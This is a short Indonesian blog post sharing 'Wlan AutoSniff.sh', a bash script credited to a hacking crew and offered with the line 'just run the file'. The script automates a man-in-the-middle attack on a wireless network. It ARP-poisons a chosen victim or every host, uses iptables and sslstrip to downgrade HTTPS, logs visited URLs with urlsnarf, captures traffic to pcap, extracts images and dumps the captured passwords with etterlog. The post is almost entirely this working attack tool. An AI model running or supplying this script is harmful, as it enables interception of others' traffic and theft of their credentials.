Kamis, 28 April 2011

Wlan AutoSniff.sh

0 komentar
Code:
########################################################
# rec0ded by yur4kh4 #
# auto sniff #
# Malang cyber crew #
# contact :yur4kh4[at]mc-crew[dot]net #
########################################################
#!/bin/bash
echo -n "acces wireshark klo udah selesai? If yes, [enter] "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, [enter] "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (beri nama folder hasil kerja): "
read -e SESSION
echo -n "Gateway IP - biarkan kosong (default): "
read -e ROUTER
echo -n "Target IP - biarkan kosong (babat semua IP): "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
just run the file on ur console 
ex : ./autosniff.sh


http://exploit-id.com/tools/wlan-autosniff-sh

Leave a Reply

Labels